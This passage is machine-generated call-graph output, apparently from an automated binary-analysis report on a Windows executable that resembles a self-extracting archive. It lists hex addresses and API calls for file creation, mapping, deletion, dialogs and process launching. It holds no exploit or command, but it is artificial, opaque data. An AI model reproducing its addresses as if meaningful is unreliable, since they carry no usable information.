b8e1de 24189->24195 24264 ba8cce 26 API calls 2 library calls 24189->24264 24192 b8e16e 24265 ba7625 26 API calls 2 library calls 24192->24265 24194 b8e1c6 24266 b8e27c 78 API calls 24194->24266 24196 b8e214 24195->24196 24198 b8e261 78 API calls 24195->24198 24199 ba6310 26 API calls 24196->24199 24198->24195 24200 b8e22d 24199->24200 24201 ba6310 26 API calls 24200->24201 24201->24188 24204 b91da7 WideCharToMultiByte 24204->24206 24206->24188 24206->24189 24206->24204 24259 b8e5b1 50 API calls __vsnprintf 24206->24259 24260 ba6159 26 API calls 3 library calls 24206->24260 24261 ba8cce 26 API calls 2 library calls 24206->24261 24262 ba7625 26 API calls 2 library calls 24206->24262 24263 b8e27c 78 API calls 24206->24263 24208 b8e29e GetModuleHandleW FindResourceW 24209 b8da55 24208->24209 24209->24051 24211 b898ea 24210->24211 24212 b8994b CreateFileW 24211->24212 24213 b8996c GetLastError 24212->24213 24217 b899bb 24212->24217 24267 b8bb03 24213->24267 24215 b8998c 24216 b89990 CreateFileW GetLastError 24215->24216 24215->24217 24216->24217 24220 b899b5 24216->24220 24218 b899ff 24217->24218 24219 b899e5 SetFileTime 24217->24219 24218->24175 24219->24218 24220->24217 24222 ba6349 24221->24222 24223 ba634d 24222->24223 24234 ba6375 24222->24234 24271 ba91a8 20 API calls _free 24223->24271 24225 ba6352 24272 ba9087 26 API calls __cftof 24225->24272 24226 ba6699 24228 b9fbbc _ValidateLocalCookies 5 API calls 24226->24228 24230 ba66a6 24228->24230 24229 ba635d 24231 b9fbbc _ValidateLocalCookies 5 API calls 24229->24231 24230->24176 24233 ba6369 24231->24233 24233->24176 24234->24226 24273 ba6230 5 API calls _ValidateLocalCookies 24234->24273 24236 b89e92 24235->24236 24240 b89ea5 24235->24240 24239 b89eb0 24236->24239 24274 b86d5b 77 API calls 24236->24274 24238 b89eb8 SetFilePointer 24238->24239 24241 b89ed4 GetLastError 24238->24241 24239->24185 24240->24238 24240->24239 24241->24239 24242 b89ede 24241->24242 24242->24239 24275 b86d5b 77 API calls 24242->24275 24245 b895be 24244->24245 24250 b895cf 24244->24250 24246 b895ca 24245->24246 24247 b895d1 24245->24247 24245->24250 24276 b8974e 24246->24276 24281 b89620 24247->24281 24250->24208 24253 b89bdc 24251->24253 24255 b89be3 24251->24255 24252 b89785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24252->24255 24253->24185 24255->24252 24255->24253 24296 b86d1a 77 API calls 24255->24296 24256->24185 24257->24182 24258->24206 24259->24206 24260->24206 24261->24206 24262->24206 24263->24206 24264->24192 24265->24194 24266->24195 24268 b8bb10 _wcslen 24267->24268 24269 b8bbb8 GetCurrentDirectoryW 24268->24269 24270 b8bb39 _wcslen 24268->24270 24269->24270 24270->24215 24271->24225 24272->24229 24273->24234 24274->24240 24275->24239 24277 b89781 24276->24277 24278 b89757 24276->24278 24277->24250 24278->24277 24287 b8a1e0 24278->24287 24282 b8962c 24281->24282 24283 b8964a 24281->24283 24282->24283 24285 b89638 CloseHandle 24282->24285 24284 b89669 24283->24284 24295 b86bd5 76 API calls 24283->24295 24284->24250 24285->24283 24288 b9ec50 24287->24288 24289 b8a1ed DeleteFileW 24288->24289 24290 b8977f 24289->24290 24291 b8a200 24289->24291 24290->24250 24292 b8bb03 GetCurrentDirectoryW 24291->24292 24293 b8a214 24292->24293 24293->24290 24294 b8a218 DeleteFileW 24293->24294 24294->24290 24295->24284 24296->24255 24298 b9eb3d ___std_exception_copy 24297->24298 24299 b990d6 24298->24299 24302 b9eb59 24298->24302 24306 ba7a5e 7 API calls 2 library calls 24298->24306 24299->23825 24301 b9f5c9 24308 ba238d RaiseException 24301->24308 24302->24301 24307 ba238d RaiseException 24302->24307 24305 b9f5e6 24306->24298 24307->24301 24308->24305 24310 ba7ce1 _abort 24309->24310 24311 ba7cfa 24310->24311 24312 ba7ce8 24310->24312 24333 baac31 EnterCriticalSection 24311->24333 24345 ba7e2f GetModuleHandleW 24312->24345 24315 ba7ced 24315->24311 24346 ba7e73 GetModuleHandleExW 24315->24346 24316 ba7d9f 24334 ba7ddf 24316->24334 24321 ba7d76 24322 ba7d8e 24321->24322 24327 ba8a91 _abort 5 API calls 24321->24327 24328 ba8a91 _abort 5 API calls 24322->24328 24323 ba7d01 24323->24316 24323->24321 24354 ba87e0 20 API calls _abort 24323->24354 24324 ba7de8 24355 bb2390 5 API calls _ValidateLocalCookies 24324->24355 24325 ba7dbc 24337 ba7dee 24325->24337 24327->24322 24328->24316 24333->24323 24356 baac81 LeaveCriticalSection 24334->24356 24336 ba7db8 24336->24324 24336->24325 24357 bab076 24337->24357 24340 ba7e1c 24343 ba7e73 _abort 8 API calls 24340->24343 24341 ba7dfc GetPEB 24341->24340 24342 ba7e0c GetCurrentProcess TerminateProcess 24341->24342 24342->24340 24344 ba7e24 ExitProcess 24343->24344 24345->24315 24347 ba7e9d GetProcAddress 24346->24347 24348 ba7ec0 24346->24348 24352 ba7eb2 24347->24352 24349 ba7ecf 24348->24349 24350 ba7ec6 FreeLibrary 24348->24350 24351 b9fbbc _ValidateLocalCookies 5 API calls 24349->24351 24350->24349 24353 ba7cf9 24351->24353 24352->24348 24353->24311 24354->24321 24356->24336 24358 bab09b 24357->24358 24359 bab091 24357->24359 24360 baac98 _free 5 API calls 24358->24360 24361 b9fbbc _ValidateLocalCookies 5 API calls 24359->24361 24360->24359 24362 ba7df8 24361->24362 24362->24340 24362->24341 25476 b86faa 111 API calls 3 library calls 25423 b9dca1 DialogBoxParamW 25477 b9f3a0 27 API calls 25426 baa4a0 71 API calls _free 25427 bb08a0 IsProcessorFeaturePresent 25478 b9eda7 48 API calls _unexpected 25429 b9c793 97 API calls 4 library calls 25480 b9b18d 78 API calls 25481 b99580 6 API calls 25431 b9c793 102 API calls 4 library calls 25432 ba2cfb 38 API calls 4 library calls 25433 b85ef0 82 API calls 25484 b895f0 80 API calls 25485 b9fd4f 9 API calls 2 library calls 24397 ba98f0 24405 baadaf 24397->24405 24400 ba9904 24402 ba990c 24403 ba9919 24402->24403 24413 ba9920 11 API calls 24402->24413 24406 baac98 _free 5 API calls 24405->24406 24407 baadd6 24406->24407 24408 baadee TlsAlloc 24407->24408 24409 baaddf 24407->24409 24408->24409 24410 b9fbbc _ValidateLocalCookies 5 API calls 24409->24410 24411 ba98fa 24410->24411 24411->24400 24412 ba9869 20 API calls _free 24411->24412 24412->24402 24413->24400 24415 baabf0 24416 baabfb 24415->24416 24417 baaf0a 11 API calls 24416->24417 24418 baac24 24416->24418 24419 baac20 24416->24419 24417->24416 24421 baac50 DeleteCriticalSection 24418->24421 24421->24419 25434 ba88f0 7 API calls ___scrt_uninitialize_crt 25487 b8f1e8 FreeLibrary 24440 b9b7e0 24441 b9b7ea __EH_prolog 24440->24441 24608 b81316 24441->24608 24444 b9b841 24445 b9b82a 24445->24444 24449 b9b838 24445->24449 24450 b9b89b 24445->24450 24446 b9bf0f 24673 b9d69e 24446->24673 24451 b9b878 24449->24451 24452 b9b83c 24449->24452 24455 b9b92e GetDlgItemTextW 24450->24455 24459 b9b8b1 24450->24459 24451->24444 24462 b9b95f KiUserCallbackDispatcher 24451->24462 24452->24444 24460 b8e617 53 API calls 24452->24460 24453 b9bf38 24456 b9bf41 SendDlgItemMessageW 24453->24456 24457 b9bf52 GetDlgItem SendMessageW 24453->24457 24454 b9bf2a SendMessageW 24454->24453 24455->24451 24458 b9b96b 24455->24458 24456->24457 24691 b9a64d GetCurrentDirectoryW 24457->24691 24463 b9b980 GetDlgItem 24458->24463 24606 b9b974 24458->24606 24464 b8e617 53 API calls 24459->24464 24465 b9b85b 24460->24465 24462->24444 24467 b9b994 SendMessageW SendMessageW 24463->24467 24468 b9b9b7 SetFocus 24463->24468 24469 b9b8ce SetDlgItemTextW 24464->24469 24713 b8124f SHGetMalloc 24465->24713 24466 b9bf82 GetDlgItem 24473 b9bf9f 24466->24473 24474 b9bfa5 SetWindowTextW 24466->24474 24467->24468 24470 b9b9c7 24468->24470 24485 b9b9e0 24468->24485 24471 b9b8d9 24469->24471 24475 b8e617 53 API calls 24470->24475 24471->24444 24479 b9b8e6 GetMessageW 24471->24479 24473->24474 24692 b9abab GetClassNameW 24474->24692 24480 b9b9d1 24475->24480 24476 b9b862 24476->24444 24486 b9c1fc SetDlgItemTextW 24476->24486 24477 b9be55 24481 b8e617 53 API calls 24477->24481 24479->24444 24483 b9b8fd IsDialogMessageW 24479->24483 24714 b9d4d4 24480->24714 24487 b9be65 SetDlgItemTextW 24481->24487 24483->24471 24489 b9b90c TranslateMessage DispatchMessageW 24483->24489 24491 b8e617 53 API calls 24485->24491 24486->24444 24490 b9be79 24487->24490 24489->24471 24496 b8e617 53 API calls 24490->24496 24495 b9ba17 24491->24495 24492 b9b9d9 24618 b8a0b1 24492->24618 24493 b9bff0 24499 b9c020 24493->24499 24502 b8e617 53 API calls 24493->24502 24500 b84092 _swprintf 51 API calls 24495->24500 24527 b9be9c _wcslen 24496->24527 24497 b9c73f 97 API calls 24497->24493 24507 b9c73f 97 API calls 24499->24507 24560 b9c0d8 24499->24560 24503 b9ba29 24500->24503 24506 b9c003 SetDlgItemTextW 24502->24506 24509 b9d4d4 16 API calls 24503->24509 24504 b9ba68 GetLastError 24505 b9ba73 24504->24505 24624 b9ac04 SetCurrentDirectoryW 24505->24624 24513 b8e617 53 API calls 24506->24513 24515 b9c03b 24507->24515 24508 b9c18b 24510 b9c19d 24508->24510 24511 b9c194 EnableWindow 24508->24511 24509->24492 24516 b9c1ba 24510->24516 24732 b812d3 GetDlgItem EnableWindow 24510->24732 24511->24510 24512 b9beed 24519 b8e617 53 API calls 24512->24519 24517 b9c017 SetDlgItemTextW 24513->24517 24525 b9c04d 24515->24525 24551 b9c072 24515->24551 24522 b9c1e1 24516->24522 24536 b9c1d9 SendMessageW 24516->24536 24517->24499 24518 b9ba87 24523 b9ba9e 24518->24523 24524 b9ba90 GetLastError 24518->24524 24519->24444 24520 b9c0cb 24528 b9c73f 97 API calls 24520->24528 24522->24444 24537 b8e617 53 API calls 24522->24537 24529 b9bb11 24523->24529 24532 b9bb20 24523->24532 24538 b9baae GetTickCount 24523->24538 24524->24523 24730 b99ed5 32 API calls 24525->24730 24526 b9c1b0 24733 b812d3 GetDlgItem EnableWindow 24526->24733 24527->24512 24531 b8e617 53 API calls 24527->24531 24528->24560 24529->24532 24533 b9bd56 24529->24533 24540 b9bed0 24531->24540 24542 b9bcfb 24532->24542 24543 b9bb39 GetModuleFileNameW 24532->24543 24544 b9bcf1 24532->24544 24633 b812f1 GetDlgItem ShowWindow 24533->24633 24534 b9c066 24534->24551 24536->24522 24537->24476 24539 b84092 _swprintf 51 API calls 24538->24539 24546 b9bac7 24539->24546 24547 b84092 _swprintf 51 API calls 24540->24547 24541 b9c169 24731 b99ed5 32 API calls 24541->24731 24550 b8e617 53 API calls 24542->24550 24724 b8f28c 82 API calls 24543->24724 24544->24451 24544->24542 24625 b8966e 24546->24625 24547->24512 24556 b9bd05 24550->24556 24551->24520 24557 b9c73f 97 API calls 24551->24557 24552 b9bd66 24634 b812f1 GetDlgItem ShowWindow 24552->24634 24553 b8e617 53 API calls 24553->24560 24554 b9c188 24554->24508 24555 b9bb5f 24561 b84092 _swprintf 51 API calls 24555->24561 24562 b84092 _swprintf 51 API calls 24556->24562 24563 b9c0a0 24557->24563 24559 b9bd70 24564 b8e617 53 API calls 24559->24564 24560->24508 24560->24541 24560->24553 24566 b9bb81 CreateFileMappingW 24561->24566 24567 b9bd23 24562->24567 24563->24520 24568 b9c0a9 DialogBoxParamW 24563->24568 24569 b9bd7a SetDlgItemTextW 24564->24569 24571 b9bbe3 GetCommandLineW 24566->24571 24602 b9bc60 __InternalCxxFrameHandler 24566->24602 24580 b8e617 53 API calls 24567->24580 24568->24451 24568->24520 24635 b812f1 GetDlgItem ShowWindow 24569->24635 24570 b9baed 24574 b9baff 24570->24574 24575 b9baf4 GetLastError 24570->24575 24576 b9bbf4 24571->24576 24572 b9bc6b ShellExecuteExW 24597 b9bc88 24572->24597 24578 b8959a 80 API calls 24574->24578 24575->24574 24725 b9b425 SHGetMalloc 24576->24725 24577 b9bd8c SetDlgItemTextW GetDlgItem 24581 b9bda9 GetWindowLongW SetWindowLongW 24577->24581 24582 b9bdc1 24577->24582 24578->24529 24584 b9bd3d 24580->24584 24581->24582 24636 b9c73f 24582->24636 24583 b9bc10 24726 b9b425 SHGetMalloc 24583->24726 24588 b9bc1c 24727 b9b425 SHGetMalloc 24588->24727 24589 b9bccb 24589->24544 24595 b9bce1 UnmapViewOfFile CloseHandle 24589->24595 24590 b9c73f 97 API calls 24592 b9bddd 24590->24592 24661 b9da52 24592->24661 24593 b9bc28 24728 b8f3fa 82 API calls 2 library calls 24593->24728 24595->24544 24597->24589 24600 b9bcb7 Sleep 24597->24600 24599 b9bc3f MapViewOfFile 24599->24602 24600->24589 24600->24597 24601 b9c73f 97 API calls 24605 b9be03 24601->24605 24602->24572 24603 b9be2c 24729 b812d3 GetDlgItem EnableWindow 24603->24729 24605->24603 24607 b9c73f 97 API calls 24605->24607 24606->24451 24606->24477 24607->24603 24609 b81378 24608->24609 24610 b8131f 24608->24610 24735 b8e2c1 GetWindowLongW SetWindowLongW 24609->24735 24611 b81385 24610->24611 24734 b8e2e8 62 API calls 2 library calls 24610->24734 24611->24444 24611->24445 24611->24446 24614 b81341 24614->24611 24615 b81354 GetDlgItem 24614->24615 24615->24611 24616 b81364 24615->24616 24616->24611 24617 b8136a SetWindowTextW 24616->24617 24617->24611 24621 b8a0bb 24618->24621 24619 b8a14c 24620 b8a2b2 8 API calls 24619->24620 24622 b8a175 24619->24622 24620->24622 24621->24619 24621->24622 24736 b8a2b2 24621->24736 24622->24504 24622->24505 24624->24518 24626 b89678 24625->24626 24627 b896d5 CreateFileW 24626->24627 24628 b896c9 24626->24628 24627->24628 24629 b8bb03 GetCurrentDirectoryW 24628->24629 24630 b8971f 24628->24630 24631 b89704 24629->24631 24630->24570 24631->24630 24632 b89708 CreateFileW 24631->24632 24632->24630 24633->24552 24634->24559 24635->24577 24637 b9c749 __EH_prolog 24636->24637 24642 b9bdcf 24637->24642 24768 b9b314 24637->24768 24640 b9b314 ExpandEnvironmentStringsW 24651 b9c780 _wcslen _wcsrchr 24640->24651 24641 b9ca67 SetWindowTextW 24641->24651 24642->24590 24647 b9c855 SetFileAttributesW 24649 b9c90f GetFileAttributesW 24647->24649 24660 b9c86f _abort _wcslen 24647->24660 24649->24651 24652 b9c921 DeleteFileW 24649->24652 24651->24640 24651->24641 24651->24642 24651->24647 24653 b9cc31 GetDlgItem SetWindowTextW SendMessageW 24651->24653 24657 b9cc71 SendMessageW 24651->24657 24772 b91fbb CompareStringW 24651->24772 24773 b9a64d GetCurrentDirectoryW 24651->24773 24775 b8a5d1 6 API calls 24651->24775 24776 b8a55a FindClose 24651->24776 24777 b9b48e 76 API calls 2 library calls 24651->24777 24778 ba3e3e 24651->24778 24652->24651 24654 b9c932 24652->24654 24653->24651 24655 b84092 _swprintf 51 API calls 24654->24655 24656 b9c952 GetFileAttributesW 24655->24656 24656->24654 24658 b9c967 MoveFileW 24656->24658 24657->24651 24658->24651 24659 b9c97f MoveFileExW 24658->24659 24659->24651 24660->24649 24660->24651 24774 b8b991 51 API calls 2 library calls 24660->24774 24662 b9da5c __EH_prolog 24661->24662 24793 b90659 24662->24793 24664 b9da8d 24797 b85b3d 24664->24797 24666 b9daab 24801 b87b0d 24666->24801 24670 b9dafe 24817 b87b9e 24670->24817 24672 b9bdee 24672->24601 24674 b9d6a8 24673->24674 24675 b9a5c6 4 API calls 24674->24675 24676 b9d6ad 24675->24676 24677 b9d6b5 GetWindow 24676->24677 24678 b9bf15 24676->24678 24677->24678 24679 b9d6d5 24677->24679 24678->24453 24678->24454 24679->24678 24680 b9d6e2 GetClassNameW 24679->24680 24682 b9d76a GetWindow 24679->24682 24683 b9d706 GetWindowLongW 24679->24683 25298 b91fbb CompareStringW 24680->25298 24682->24678 24682->24679 24683->24682 24684 b9d716 SendMessageW 24683->24684 24684->24682 24685 b9d72c GetObjectW 24684->24685 25299 b9a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24685->25299 24687 b9d743 25300 b9a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24687->25300 25301 b9a80c 8 API calls 24687->25301 24690 b9d754 SendMessageW DeleteObject 24690->24682 24691->24466 24693 b9abcc 24692->24693 24694 b9abf1 24692->24694 25302 b91fbb CompareStringW 24693->25302 24695 b9abff 24694->24695 24696 b9abf6 SHAutoComplete 24694->24696 24700 b9b093 24695->24700 24696->24695 24698 b9abdf 24698->24694 24699 b9abe3 FindWindowExW 24698->24699 24699->24694 24701 b9b09d __EH_prolog 24700->24701 24702 b813dc 84 API calls 24701->24702 24703 b9b0bf 24702->24703 25303 b81fdc 24703->25303 24706 b9b0d9 24708 b81692 86 API calls 24706->24708 24707 b9b0eb 24709 b819af 128 API calls 24707->24709 24710 b9b0e4 24708->24710 24712 b9b10d __InternalCxxFrameHandler ___std_exception_copy 24709->24712 24710->24493 24710->24497 24711 b81692 86 API calls 24711->24710 24712->24711 24713->24476 25311 b9b568 PeekMessageW 24714->25311 24717 b9d502 24721 b9d50d ShowWindow SendMessageW SendMessageW 24717->24721 24718 b9d536 SendMessageW SendMessageW 24719 b9d591 SendMessageW SendMessageW SendMessageW 24718->24719 24720 b9d572 24718->24720 24722 b9d5c4 SendMessageW 24719->24722 24723 b9d5e7 SendMessageW 24719->24723 24720->24719 24721->24718 24722->24723 24723->24492 24724->24555 24725->24583 24726->24588 24727->24593 24728->24599 24729->24606 24730->24534 24731->24554 24732->24526 24733->24516 24734->24614 24735->24611 24737 b8a2bf 24736->24737 24738 b8a2e3 24737->24738 24739 b8a2d6 CreateDirectoryW 24737->24739 24757 b8a231 24738->24757 24739->24738 24741 b8a316 24739->24741 24744 b8a325 24741->24744 24749 b8a4ed 24741->24749 24743 b8a329 GetLastError 24743->24744 24744->24621 24745 b8bb03 GetCurrentDirectoryW 24747 b8a2ff 24745->24747 24747->24743 24748 b8a303 CreateDirectoryW 24747->24748 24748->24741 24748->24743 24750 b9ec50 24749->24750 24751 b8a4fa SetFileAttributesW 24750->24751 24752 b8a53d 24751->24752 24753 b8a510 24751->24753 24752->24744 24754 b8bb03 GetCurrentDirectoryW 24753->24754 24755 b8a524 24754->24755 24755->24752 24756 b8a528 SetFileAttributesW 24755->24756 24756->24752 24760 b8a243 24757->24760 24761 b9ec50 24760->24761 24762 b8a250 GetFileAttributesW 24761->24762 24763 b8a23a 24762->24763 24764 b8a261 24762->24764 24763->24743 24763->24745 24765 b8bb03 GetCurrentDirectoryW 24764->24765 24766 b8a275 24765->24766 24766->24763 24767 b8a279 GetFileAttributesW 24766->24767 24767->24763 24769 b9b31e 24768->24769 24770 b9b40d 24769->24770 24771 b9b3f0 ExpandEnvironmentStringsW 24769->24771 24770->24651 24771->24770 24772->24651 24773->24651 24774->24660 24775->24651 24776->24651 24777->24651 24779 ba8e54 24778->24779 24780 ba8e6c 24779->24780 24781 ba8e61 24779->24781 24783 ba8e74 24780->24783 24789 ba8e7d _free 24780->24789 24782 ba8e06 __vswprintf_c_l 21 API calls 24781->24782 24788 ba8e69 24782->24788 24784 ba8dcc _free 20 API calls 24783->24784 24784->24788 24785 ba8e82 24791 ba91a8 20 API calls _free 24785->24791 24786 ba8ea7 HeapReAlloc 24786->24788 24786->24789 24788->24651 24789->24785 24789->24786 24792 ba7a5e 7 API calls 2 library calls 24789->24792 24791->24788 24792->24789 24794 b90666 _wcslen 24793->24794 24821 b817e9 24794->24821 24796 b9067e 24796->24664 24798 b90659 _wcslen 24797->24798 24799 b817e9 78 API calls 24798->24799 24800 b9067e 24799->24800 24800->24666 24802 b87b17 __EH_prolog 24801->24802 24838 b8ce40 24802->24838 24804 b87b32 24805 b9eb38 8 API calls 24804->24805 24806 b87b5c 24805->24806 24844 b94a76 24806->24844 24809 b87c7d 24810 b87c87 24809->24810 24812 b87cf1 24810->24812 24873 b8a56d 24810->24873 24815 b87d50 24812->24815 24851 b88284 24812->24851 24813 b87d92 24813->24670 24815->24813 24879 b8138b 74 API calls 24815->24879 24818 b87bac 24817->24818 24820 b87bb3 24817->24820 24819 b92297 86 API calls 24818->24819 24819->24820 24822 b817ff 24821->24822 24833 b8185a __InternalCxxFrameHandler 24821->24833 24823 b81828 24822->24823 24834 b86c36 76 API calls __vswprintf_c_l 24822->24834 24825 b81887 24823->24825 24828 b81847 ___std_exception_copy 24823->24828 24827 ba3e3e 22 API calls 24825->24827 24826 b8181e 24835 b86ca7 75 API calls 24826->24835 24830 b8188e 24827->24830 24828->24833 24836 b86ca7 75 API calls 24828->24836 24830->24833 24837 b86ca7 75 API calls 24830->24837 24833->24796 24834->24826 24835->24823 24836->24833 24837->24833 24839 b8ce4a __EH_prolog 24838->24839 24840 b9eb38 8 API calls 24839->24840 24841 b8ce8d 24840->24841 24842 b9eb38 8 API calls 24841->24842 24843 b8ceb1 24842->24843 24843->24804 24845 b94a80 __EH_prolog 24844->24845 24846 b9eb38 8 API calls 24845->24846 24847 b94a9c 24846->24847 24848 b87b8b 24847->24848 24850 b90e46 80 API calls 24847->24850 24848->24809 24850->24848 24852 b8828e __EH_prolog 24851->24852 24880 b813dc 24852->24880 24854 b882aa 24855 b882bb 24854->24855 25023 b89f42 24854->25023 24858 b882f2 24855->24858 24888 b81a04 24855->24888 25019 b81692 24858->25019 24861 b882ee 24861->24858 24869 b8a56d 7 API calls 24861->24869 24871 b88389 24861->24871 25027 b8c0c5 CompareStringW _wcslen 24861->25027 24864 b883e8 24915 b81f6d 24864->24915 24869->24861 24870 b883f3 24870->24858 24919 b83b2d 24870->24919 24931 b8848e 24870->24931 24907 b88430 24871->24907 24874 b8a582 24873->24874 24878 b8a5b0 24874->24878 25287 b8a69b 24874->25287 24876 b8a592 24877 b8a597 FindClose 24876->24877 24876->24878 24877->24878 24878->24810 24879->24813 24881 b813e1 __EH_prolog 24880->24881 24882 b8ce40 8 API calls 24881->24882 24883 b81419 24882->24883 24884 b9eb38 8 API calls 24883->24884 24887 b81474 _abort 24883->24887 24885 b81461 24884->24885 24885->24887 25028 b8b505 24885->25028 24887->24854 24889 b81a0e __EH_prolog 24888->24889 24901 b81a61 24889->24901 24904 b81b9b 24889->24904 25044 b813ba 24889->25044 24891 b81bc7 25047 b8138b 74 API calls 24891->25047 24894 b83b2d 101 API calls 24898 b81c12 24894->24898 24895 b81bd4 24895->24894 24895->24904 24896 b81c5a 24900 b81c8d 24896->24900 24896->24904 25048 b8138b 74 API calls 24896->25048 24898->24896 24899 b83b2d 101 API calls 24898->24899 24899->24898 24900->24904 24905 b89e80 79 API calls 24900->24905 24901->24891 24901->24895 24901->24904 24902 b83b2d 101 API calls 24903 b81cde 24902->24903 24903->24902 24903->24904 24904->24861 24905->24903 24906 b89e80 79 API calls 24906->24901 25066 b8cf3d 24907->25066 24909 b88440 25070 b913d2 GetSystemTime SystemTimeToFileTime 24909->25070 24911 b883a3 24911->24864 24912 b91b66 24911->24912 25071 b9de6b 24912->25071 24916 b81f72 __EH_prolog 24915->24916 24918 b81fa6 24916->24918 25079 b819af 24916->25079 24918->24870 24920 b83b39 24919->24920 24921 b83b3d 24919->24921 24920->24870 24930 b89e80 79 API calls 24921->24930 24922 b83b4f 24923 b83b78 24922->24923 24924 b83b6a 24922->24924 25210 b8286b 101 API calls 3 library calls 24923->25210 24926 b83baa 24924->24926 25209 b832f7 89 API calls 2 library calls 24924->25209 24926->24870 24928 b83b76 24928->24926 25211 b820d7 74 API calls 24928->25211 24930->24922 24932 b88498 __EH_prolog 24931->24932 24935 b884d5 24932->24935 24942 b88513 24932->24942 25236 b98c8d 103 API calls 24932->25236 24934 b884f5 24936 b884fa 24934->24936 24937 b8851c 24934->24937 24935->24934 24940 b8857a 24935->24940 24935->24942 24936->24942 25237 b87a0d 152 API calls 24936->25237 24937->24942 25238 b98c8d 103 API calls 24937->25238 24940->24942 25212 b85d1a 24940->25212 24942->24870 24943 b88605 24943->24942 25218 b88167 24943->25218 24946 b88797 24947 b8a56d 7 API calls 24946->24947 24950 b88802 24946->24950 24947->24950 24949 b8d051 82 API calls 24951 b8885d 24949->24951 25224 b87c0d 24950->25224 24951->24942 24951->24949 24952 b88992 24951->24952 24954 b8898b 24951->24954 25239 b88117 84 API calls 24951->25239 25240 b82021 74 API calls 24951->25240 24953 b88a5f 24952->24953 24959 b889e1 24952->24959 24958 b88ab6 24953->24958 24969 b88a6a 24953->24969 25241 b82021 74 API calls 24954->25241 24957 b88b14 24978 b88b82 24957->24978 25007 b89105 24957->25007 25245 b898bc 24957->25245 24967 b88a4c 24958->24967 25244 b87fc0 97 API calls 24958->25244 24959->24957 24961 b8a231 3 API calls 24959->24961 24959->24967 24960 b8959a 80 API calls 24960->24942 24965 b88a19 24961->24965 24963 b8959a 80 API calls 24963->24942 24964 b88ab4 24964->24960 24965->24967 25242 b892a3 97 API calls 24965->25242 24966 b8ab1a 8 API calls 24970 b88bd1 24966->24970 24967->24957 24967->24964 24969->24964 25243 b87db2 101 API calls 24969->25243 24973 b8ab1a 8 API calls 24970->24973 24988 b88be7 24973->24988 24976 b88b70 25249 b86e98 77 API calls 24976->25249 24978->24966 24979 b88cbc 24980 b88d18 24979->24980 24981 b88e40 24979->24981 24982 b88d8a 24980->24982 24985 b88d28 24980->24985 24983 b88e52 24981->24983 24984 b88e66 24981->24984 25004 b88d49 24981->25004 24992 b88167 19 API calls 24982->24992 24986 b89215 123 API calls 24983->24986 24987 b93377 75 API calls 24984->24987 24989 b88d6e 24985->24989 24996 b88d37 24985->24996 24986->25004 24990 b88e7f 24987->24990 24988->24979 24991 b88c93 24988->24991 24998 b8981a 79 API calls 24988->24998 24989->25004 25252 b877b8 111 API calls 24989->25252 25255 b93020 123 API calls 24990->25255 24991->24979 25250 b89a3c 82 API calls 24991->25250 24995 b88dbd 24992->24995 25000 b88df5 24995->25000 25001 b88de6 24995->25001 24995->25004 25251 b82021 74 API calls 24996->25251 24998->24991 25254 b89155 93 API calls __EH_prolog 25000->25254 25253 b87542 85 API calls 25001->25253 25008 b88f85 25004->25008 25256 b82021 74 API calls 25004->25256 25006 b89090 25006->25007 25009 b8a4ed 3 API calls 25006->25009 25007->24963 25008->25006 25008->25007 25010 b8903e 25008->25010 25230 b89f09 SetEndOfFile 25008->25230 25011 b890eb 25009->25011 25231 b89da2 25010->25231 25011->25007 25257 b82021 74 API calls 25011->25257 25014 b89085 25016 b89620 77 API calls 25014->25016 25016->25006 25017 b890fb 25258 b86dcb 76 API calls 25017->25258 25020 b816a4 25019->25020 25274 b8cee1 25020->25274 25024 b89f59 25023->25024 25025 b89f63 25024->25025 25286 b86d0c 78 API calls 25024->25286 25025->24855 25027->24861 25029 b8b50f __EH_prolog 25028->25029 25034 b8f1d0 82 API calls 25029->25034 25031 b8b521 25035 b8b61e 25031->25035 25034->25031 25036 b8b630 _abort 25035->25036 25039 b910dc 25036->25039 25042 b9109e GetCurrentProcess GetProcessAffinityMask 25039->25042 25043 b8b597 25042->25043 25043->24887 25049 b81732 25044->25049 25046 b813d6 25046->24906 25047->24904 25048->24900 25050 b81748 25049->25050 25061 b817a0 __InternalCxxFrameHandler 25049->25061 25051 b81771 25050->25051 25062 b86c36 76 API calls __vswprintf_c_l 25050->25062 25052 b817c7 25051->25052 25058 b8178d ___std_exception_copy 25051->25058 25054 ba3e3e 22 API calls 25052->25054 25056 b817ce 25054->25056 25055 b81767 25063 b86ca7 75 API calls 25055->25063 25056->25061 25065 b86ca7 75 API calls 25056->25065 25058->25061 25064 b86ca7 75 API calls 25058->25064 25061->25046 25062->25055 25063->25051 25064->25061 25065->25061 25067 b8cf4d 25066->25067 25069 b8cf54 25066->25069 25068 b8981a 79 API calls 25067->25068 25068->25069 25069->24909 25070->24911 25072 b9de78 25071->25072 25073 b8e617 53 API calls 25072->25073 25074 b9de9b 25073->25074 25075 b84092 _swprintf 51 API calls 25074->25075 25076 b9dead 25075->25076 25077 b9d4d4 16 API calls 25076->25077 25078 b91b7c 25077->25078 25078->24864 25080 b819bf 25079->25080 25082 b819bb 25079->25082 25083 b818f6 25080->25083 25082->24918 25084 b81908 25083->25084 25085 b81945 25083->25085 25086 b83b2d 101 API calls 25084->25086 25091 b83fa3 25085->25091 25090 b81928 25086->25090 25090->25082 25095 b83fac 25091->25095 25092 b83b2d 101 API calls 25092->25095 25093 b81966 25093->25090 25096 b81e50 25093->25096 25095->25092 25095->25093 25108 b90e08 25095->25108 25097 b81e5a __EH_prolog 25096->25097 25116 b83bba 25097->25116 25099 b81e84 25100 b81732 78 API calls 25099->25100 25102 b81f0b 25099->25102 25101 b81e9b 25100->25101 25144 b818a9 78 API calls 25101->25144 25102->25090 25104 b81eb3 25105 b81ebf _wcslen 25104->25105 25145 b91b84 MultiByteToWideChar 25104->25145 25146 b818a9 78 API calls 25105->25146 25109 b90e0f 25108->25109 25110 b90e2a 25109->25110 25114 b86c31 RaiseException CallUnexpected 25109->25114 25112 b90e3b SetThreadExecutionState 25110->25112 25115 b86c31 RaiseException CallUnexpected 25110->25115 25112->25095 25114->25110 25115->25112 25117 b83bc4 __EH_prolog 25116->25117 25118 b83bda 25117->25118 25119 b83bf6 25117->25119 25172 b8138b 74 API calls 25118->25172 25121 b83e51 25119->25121 25124 b83c22 25119->25124 25189 b8138b 74 API calls 25121->25189 25123 b83be5 25123->25099 25124->25123 25147 b93377 25124->25147 25126 b83ca3 25127 b83d2e 25126->25127 25143 b83c9a 25126->25143 25175 b8d051 25126->25175 25157 b8ab1a 25127->25157 25128 b83c9f 25128->25126 